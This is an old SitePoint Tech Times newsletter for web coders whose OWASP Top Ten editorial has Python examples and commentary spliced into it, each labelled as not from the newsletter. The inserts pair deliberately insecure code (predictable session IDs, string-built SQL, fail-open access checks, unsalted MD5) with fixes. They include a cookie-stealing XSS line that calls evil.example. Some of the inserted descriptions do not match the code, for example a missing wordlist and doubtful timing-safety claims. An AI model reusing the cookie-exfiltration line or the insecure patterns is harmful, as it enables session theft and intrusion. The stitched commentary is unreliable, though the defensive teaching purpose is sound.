Tips, Tricks, News and Reviews for Web Coders
In This Issue...
Note: This newsletter is supported solely by advertisers like the one
below. We stand 100% behind every ad that we run. If you ever have a
problem with a company that advertises here please contact us and we will
try to get it resolved. - Kevin Yank
Yes! Now You CAN
Compete With the Big Guys
"Proposal Kit is great! I sold my first client
using one of its many functions (a pricing spreadsheet which calculates
your bid then exports to an HTML page). I sent the client the link...and
it was done.
I balked at the price when I first found it... but it is better than any
freebie you'll find out there anyway."
You get dozens of tools including:
-> Accurate cost estimate tools (Never quote by the hour!)
-> Sales tools including customizable proposal letters
-> Legal contracts for US, UK, Australian and Canadian clients
Grow your client base today -- with a 100% money-back guarantee
Hi, Tech Timers!
Do you enjoy SitePoint content? Wish you could have that sort of stuff
featured on your site? Well now you can! We've just put together a new SitePoint
Content Syndication page that explains the different ways you can
feature SitePoint content on your site.
In this issue, I explain the Top 10 most common security vulnerabilities
in Web applications, as recently ranked by the Open Web Application Security Project
(OWASP). Our feature article describes PHP Assertions, a feature available
since PHP 4 that hasn't attracted the attention it deserves. And with the
holiday season well behind us, we're returning
to our regular review schedule with "MySQL Cookbook", a new
O'Reilly book covered this issue.
Lastly, don't forget to visit SitePoint.com next week as we kick off our
.NET Theme Week on Monday!
Enjoy!
Kevin Yank
techtimes@sitepoint.com
We value your membership. If for some reason at this time it is
inconvenient for you, you may discontinue your subscription by simply
sending a "Blank" email to the following address: leave-techtimes-html-8530646R@lists.sitepoint.com. Scroll to
the very bottom of this issue for further instructions if you have
problems.
Editorial
Top 10 Web Application Security Flaws
The Open Web Application
Security Project (OWASP) is an Open Source organization dedicated to
raising awareness of Web application and Web service security issues and
developing tools to address them.
OWASP recently published its Top Ten report (PDF, 336KB): a breakdown and analysis of the most
common security vulnerabilities that are found in today's Web
applications, and how to protect yourself against them.
It's definitely worth downloading the report, but here are their top 10
issues summarized if you're just curious what they are:
1. Unvalidated Parameters
Anything that a Web browser sends to a Web server as part of an HTTP
request (including headers, form fields, and cookies) can easily be forged
or corrupted to serve an attacker's agenda. Every piece of data that comes
from the client must therefore be submitted to rigorous scrutiny by a Web
application before it is trusted.
2. Broken Access Control
Access control is the process of limiting a user's access to particular
protected content once he or she has logged in. That is, even though he
has logged in to the company's Web site, an employee should not have
access to corporate payroll records unless he works in human resources.
The webs of overlapping permissions that can exist in such systems are
often problematic and prone to hacking.
3. Broken Account and Session Management
This vulnerability has to do with the actual login/authentication process,
and how that login is subsequently maintained. Proper design of session
IDs and features such as "e-mail me my password" can greatly
narrow common angles of attack that would allow a hacker to assume the
identity of an authorized user on your site.
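The session-ID and "e-mail me my password" points above, as an added example that is not from the newsletter or the OWASP report. The store, the idle timeout, the token lifetime and the user names are assumptions chosen for illustration; the point is that IDs and reset tokens come from the OS CSPRNG, are rotated on login, expire, and are never mailed or stored in the clear.

```python
import hashlib
import secrets
from typing import Dict, Optional

# Added example (not the newsletter's or OWASP's code). Timeouts are assumptions.
SESSION_IDLE_SECONDS = 30 * 60      # assumed idle timeout
RESET_TOKEN_SECONDS = 15 * 60       # assumed reset-token lifetime


def predictable_session_id(user_id: int, now: int) -> str:
    """The anti-pattern: an ID built from public data. Anyone who knows a
    victim's user_id and roughly when they logged in can enumerate it."""
    return f"{user_id}-{now}"


def new_session_id() -> str:
    """256 bits from the OS CSPRNG: cannot be guessed or enumerated."""
    return secrets.token_urlsafe(32)


def _digest(token: str) -> str:
    # Only a hash of the ID/token is stored, so a leaked table is not a
    # collection of live credentials.
    return hashlib.sha256(token.encode()).hexdigest()


class SessionStore:
    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}   # sid digest -> record
        self._resets: Dict[str, dict] = {}     # reset-token digest -> record

    def login(self, username: str, now: int, old_sid: Optional[str] = None) -> str:
        # Issue a fresh ID on every login so an ID planted before
        # authentication (session fixation) never becomes a valid one.
        if old_sid is not None:
            self._sessions.pop(_digest(old_sid), None)
        sid = new_session_id()
        self._sessions[_digest(sid)] = {"user": username, "last_seen": now}
        return sid

    def user_for(self, sid: str, now: int) -> Optional[str]:
        rec = self._sessions.get(_digest(sid))
        if rec is None:
            return None
        if now - rec["last_seen"] > SESSION_IDLE_SECONDS:
            del self._sessions[_digest(sid)]      # idle timeout
            return None
        rec["last_seen"] = now
        return rec["user"]

    def logout(self, sid: str) -> None:
        self._sessions.pop(_digest(sid), None)

    # "E-mail me my password": never mail the password. Mail a single-use,
    # short-lived token and let the user choose a new password with it.
    def issue_reset_token(self, username: str, now: int) -> str:
        token = secrets.token_urlsafe(32)
        self._resets[_digest(token)] = {"user": username, "issued": now}
        return token

    def redeem_reset_token(self, token: str, now: int) -> Optional[str]:
        rec = self._resets.pop(_digest(token), None)   # pop: single use
        if rec is None or now - rec["issued"] > RESET_TOKEN_SECONDS:
            return None
        return rec["user"]
```

Lookups go through the SHA-256 digest of the presented value, so neither a database dump nor a timing difference on the dictionary lookup hands an attacker a usable session ID or reset token.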
4. Cross-Site Scripting (XSS) Flaws
XSS attacks occur when an attacker is able to use a legitimate feature of a
Web application (a forum post, a profile field, a search box that echoes
its query) to make the application send script to another user's browser.
The typical example is JavaScript embedded in a forum post that runs, with
the reader's cookies and session, in the browser of every user who views
that post. Filtering out "bad" markup is routinely bypassed; the reliable
defence is to encode user-supplied data for the context it is written into
(HTML text, attribute, URL) so the browser treats it as data, not markup.
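The forum-post example above, as an added illustration that is not from the newsletter or OWASP. The poisoned post is constructed, and the renderer, the blacklist filter and the profile-link helper are hypothetical; the block shows the raw rendering, why a blacklist filter is not enough, and context-specific encoding for text, attribute and URL positions.

```python
import html
from urllib.parse import quote

# Added example; the post and the page fragments are constructed.
CONSTRUCTED_POST = (
    '<script>document.location="http://evil.example/?c="+document.cookie</script>'
)


def render_post_unsafe(author: str, body: str) -> str:
    # Whatever the poster typed becomes markup in every reader's browser.
    return f'<div class="post"><b>{author}</b>: {body}</div>'


def naive_filter(body: str) -> str:
    # A blacklist filter of the kind that looks adequate and is not: one
    # pass of removal is defeated by nesting the forbidden token in itself.
    return body.replace("<script>", "")


def render_post_safe(author: str, body: str) -> str:
    # HTML text context: & < > " ' become entities, so the browser shows
    # the characters instead of parsing them.
    return (
        f'<div class="post"><b>{html.escape(author)}</b>: '
        f'{html.escape(body)}</div>'
    )


def render_profile_link_safe(user_id: str, display: str) -> str:
    # URL-in-attribute context needs two layers: percent-encode the value
    # for the URL, then entity-encode the whole attribute value.
    href = "/profile?user=" + quote(user_id, safe="")
    return f'<a href="{html.escape(href, quote=True)}">{html.escape(display)}</a>'


def contains_active_markup(fragment: str) -> bool:
    # Crude detector used only to show the difference between the outputs.
    lowered = fragment.lower()
    return "<script" in lowered or "javascript:" in lowered
```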
5. Buffer Overflows
Anyone who works on the Web has likely heard of buffer overflows. These
occur when carefully-formatted input causes the server software hosting
a Web application (or, less often, the Web application itself) to write
past the end of a fixed-size buffer and corrupt its own memory, causing
either a crash or an exploitable breach in security. Keep your server
software up-to-date and, if you write Web applications in a low-level
language such as C, practise safe memory handling: bounds-check every
copy into a fixed-size buffer.
6. Command Injection Flaws
Related to Issue #1 (Unvalidated Parameters), command injection flaws
occur when user input is interpreted by the Web application or an external
system that it calls (e.g. a database server, or the operating system
shell) as part of a command rather than as data. By formatting input so
that it contains SQL or shell syntax, an attacker can make your server run
statements you never wrote. Validating user input helps, but the robust
fix is to keep data out of the command channel altogether: pass values as
bound parameters to the database, and as separate arguments to an external
program, rather than building a string that is then parsed.
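Issues #1 and #6 together, as an added example that is neither the newsletter's nor OWASP's code. The table, its three rows and the parameter names are constructed; the block puts the string-built query beside the parameterised one, runs the classic `' OR '1'='1` payload against both, and shows allow-list validation of a username and strict parsing of a numeric parameter.

```python
import re
import sqlite3
from typing import List, Optional, Tuple

# Added example; schema and rows are constructed for the demonstration.


def open_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (name, is_admin) VALUES (?, ?)",
        [("alice", 0), ("bob", 0), ("root", 1)],
    )
    conn.commit()
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    # The parameter is spliced into the statement, so the client can
    # rewrite the WHERE clause and read every row.
    sql = f"SELECT id, name FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    # Bound parameter: the driver sends the value out-of-band; it is
    # never parsed as SQL, whatever it contains.
    return conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (name,)
    ).fetchall()


# Allow-list validation for a parameter whose legal shape is known.
USERNAME_RE = re.compile(r"\A[a-z][a-z0-9_]{0,31}\Z")


def validate_username(raw: Optional[str]) -> Optional[str]:
    if raw is None or not USERNAME_RE.match(raw):
        return None
    return raw


def validate_page_size(raw: Optional[str], default: int = 20, maximum: int = 100) -> int:
    # Numeric parameter: parse strictly and clamp to a server-chosen range;
    # a client-supplied "page_size=999999" must not become a full table dump.
    try:
        n = int(raw) if raw is not None else default
    except ValueError:
        return default
    return min(max(n, 1), maximum)
```

Validation and parameterisation are complementary: the allow-list rejects the payload before it reaches the database, and the bound parameter guarantees that a value which slips past validation (or comes from a field with no obvious "shape", such as a comment) is still treated as data.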
7. Error Handling Problems
When a problem occurs (or is caused by an attacker), the error messages
that are generated may often provide tidbits of information that will
assist attackers in exploiting other vulnerabilities in your site. Also,
access control scripts must be carefully designed so that they don't
mistakenly grant access in the event of an error.
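Issue #2's payroll scenario and Issue #7's "don't grant access on error" warning, as one added example that is not from the newsletter or OWASP. The users, departments and payroll rows are constructed, and the three functions are hypothetical: the first authenticates but never authorises, the second contains the fail-open bug the text describes, and the third denies by default, returns the same generic message for "no such record" and "not allowed", and keeps the detail in the server log.

```python
import logging
from typing import Dict

# Added example; users, departments and records are constructed.
PAYROLL: Dict[int, dict] = {
    101: {"employee": "alice", "salary": 70000},
    102: {"employee": "bob", "salary": 65000},
}
USERS: Dict[str, dict] = {
    "alice": {"department": "engineering"},
    "bob": {"department": "engineering"},
    "hr_mgr": {"department": "human resources"},
}
HR = "human resources"
log = logging.getLogger("payroll")


class Forbidden(Exception):
    pass


def payroll_record_unsafe(current_user: str, record_id: int) -> dict:
    # Authenticated, but never authorised: any logged-in user who guesses
    # or increments an id reads anyone's salary.
    return PAYROLL[record_id]


def payroll_record_fails_open(current_user: str, record_id: int) -> dict:
    # The denial flag is only set on the happy path; a lookup failure
    # (unknown user) skips it, so the error *grants* access.
    denied = False
    try:
        if USERS[current_user]["department"] != HR:
            denied = True
    except KeyError:
        pass
    if denied:
        raise Forbidden("not HR")
    return PAYROLL[record_id]


def payroll_record(current_user: str, record_id: int) -> dict:
    # Default deny: every path that is not an explicit grant ends in
    # Forbidden. The caller sees one generic message; the reason is logged.
    try:
        dept = USERS[current_user]["department"]
        record = PAYROLL[record_id]
        if dept == HR or record["employee"] == current_user:
            return record
        log.warning("denied: user=%s record=%s dept=%s", current_user, record_id, dept)
    except KeyError as exc:
        log.warning("denied on lookup failure: user=%s record=%s missing=%s",
                    current_user, record_id, exc)
    raise Forbidden("access denied")


def try_payroll(current_user: str, record_id: int) -> str:
    # Convenience wrapper so outcomes can be compared as plain strings.
    try:
        return "ok:" + payroll_record(current_user, record_id)["employee"]
    except Forbidden as exc:
        return "denied:" + str(exc)
```

Returning the same "access denied" for a missing record and for a forbidden one matters: a distinct "not found" response lets an attacker enumerate which record ids exist before attacking the access check itself.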
8. Insecure Use of Cryptography
Realising that sensitive information should be protected with encryption
is only half the battle. Inexperienced developers can choose the wrong
encryption method for a given task, naively design custom encryption that
is easily compromised, leave the keys/certificates for encryption
unprotected, or fail to encrypt data at critical junctures (such as when
transmitting it via e-mail).
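The "wrong method for the task" point above, taken to the most common case, password storage, as an added example that is not from the newsletter or OWASP. The user table and the three-word wordlist are constructed; the block shows that a fast unsalted hash lets one pass over a wordlist crack every matching account at once, and beside it the stdlib alternative: a per-user random salt, a deliberately slow key-derivation function, and a constant-time comparison. The iteration count and record format are assumptions.

```python
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional

# Added example; the users and wordlist below are constructed.


def md5_store(password: str) -> str:
    # Anti-pattern: one fast, unsalted hash. Equal passwords collide, and
    # the wordlist only has to be hashed once to crack the whole table.
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5_table(stored: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    lookup = {md5_store(word): word for word in wordlist}
    return {user: lookup[h] for user, h in stored.items() if h in lookup}


PBKDF2_ITERATIONS = 100_000   # assumed; raise as hardware allows


def pbkdf2_store(password: str, salt: Optional[bytes] = None) -> str:
    # Per-user random salt: the same password yields a different record
    # for every user, so precomputed tables and batch cracking both fail.
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, record: str) -> bool:
    alg, iters, salt_hex, dk_hex = record.split("$")
    if alg != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    # Constant-time compare: no early exit that leaks how many bytes matched.
    return hmac.compare_digest(dk.hex(), dk_hex)
```

The record carries its own algorithm name, iteration count and salt, so the cost can be raised later and old records re-hashed on the user's next successful login without a flag day.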
9. Remote Administration Flaws
Though normally heavily protected, Web-based site administration
interfaces are often the most heavily-targeted part of a site when it
comes to hack attempts. Not taking sufficient measures to protect access
to administration interfaces, or building administration interfaces that
are unnecessarily powerful (and therefore destructive in the wrong hands)
is flirting with disaster.
10. Web and Application Server Misconfiguration
No matter how securely a Web application is written, if the server
software it runs on is improperly configured, all bets are off. Applying
security patches, disabling unnecessary services, assigning non-default
passwords, and ensuring software is properly configured to support the
security features of the Web application are all important concerns --
especially when the application is deployed on a 3rd party server that
does not fall within the purview of the application developer.
In addition to the 27 page Top Ten, OWASP has also produced a 70 page Guide to Building
Secure Web Applications and Web Services that is well worth a read,
as well as a number of software tools, both educational and practical in
nature.
Your insecure editor,
Kevin Yank
Editor, The SitePoint Tech Times
Need someone to host your website?
FoundHost.com brings the best hosting companies together in one place.
Browse our showcase categories, read the latest industry news and
articles, or search for your specific needs from a database of thousands
of web hosting companies.
NEW! - Hosting Plan Auctions
Bid on hosting plans being offered by web hosting companies. FoundHost.com
- We found your next host!
http://www.foundhost.com/
Quick Tip
Disabling Internet Explorer 6's Image Toolbar
As of version 6.0,
Internet Explorer for Windows will display a little toolbar at the top of
any large image when you hover your mouse over it. The toolbar presents
options to save, email, and print the image, and offers quick access to
the user's "My Pictures" folder.
In many instances, this toolbar can be a distracting eyesore; fortunately,
it is easy to disable. Simply add the following <meta> tag inside
the <head> tag of the page to turn off the image toolbar:
<meta http-equiv="imagetoolbar" content="no" />
This approach disables the toolbar for all images on the page. If you
prefer to disable it only for a specific image, use the galleryimg
attribute for the <img> tag instead:
<img src="myPic.gif" galleryimg="no" />
This feature can also be disabled in the user's preferences (this is one
of the first things I configure after a new Windows installation for
myself), so don't count on it being available, either.
New Technical Articles at SitePoint.com
Feature Article
Effortless (or Better!) Bug Detection with PHP Assertions
By Webb Stacey
PHP has had assertions since version 4.0, so why hasn't this
time-saving tool attracted more attention? Webb aims to correct this
travesty by explaining what assertions are and how to put them to work
spotting bugs in your code that you might otherwise miss!
Customize Dreamweaver to Your Needs
By Jason Siegel
If you've assumed that the Dreamweaver defaults are right for you,
then think again. Jason shows how easy it is to customize Dreamweaver to
the settings you *really* want.
Plan a Great Client Login System
By Sam Hastings
If you have a few clients on the books, it might be time to add a
client login area to your site. Sam shows how to plan a client area that's
secure, functional, and customisable.
Review - Microsoft Visio Professional 2002
By Patrick O'Keefe
High-end Web developers and site owners across the globe swear by it
- but MS Visio has a hefty price tag. Is it *really* worth it? Patrick
finds out.
Kev's Bookshelf
New releases for January
MySQL Cookbook, by Paul DuBois (O'Reilly), $34.97
 Paul DuBois wrote the
first MySQL book I ever read: "MySQL", published by New Riders
(see my review). To this day I have nothing but good things to say about that
book, so the opportunity to take a look at his latest MySQL book was
irresistible!
The latest in O'Reilly's relatively new Cookbook series, MySQL Cookbook adopts the same formula of exploring all aspects of a
product through short, practical "How-To" articles. Here are a
few examples of the "recipes" you'll find in this book:
- Producing XML Output
- Writing an Object-Oriented MySQL Interface for PHP
- What to do when LIMIT Requires the "Wrong" Sort Order
- Using a FULLTEXT Search with Short Words
- Counting and Identifying Duplicates
- Using MySQL-Based Storage with the PHP Session Manager
Those are just six of the over 300 recipes in the book!
Each recipe is cleverly designed to explain the problem, then very briefly
sum up the solution, then provide the full solution, code and all. The
summary is usually only a sentence or two, but it's enough to jog your
memory if you already know how to do something and just need a
reminder.
Most impressive is that this entire collection of recipes was written by
Paul DuBois -- a man who now holds both the first and second spots in my
list of top MySQL books!
Every month, I take a look at the new titles that adorn my bookshelf from
popular publishers like Wrox and O'Reilly, and also give you a heads up on
new titles that are on the way!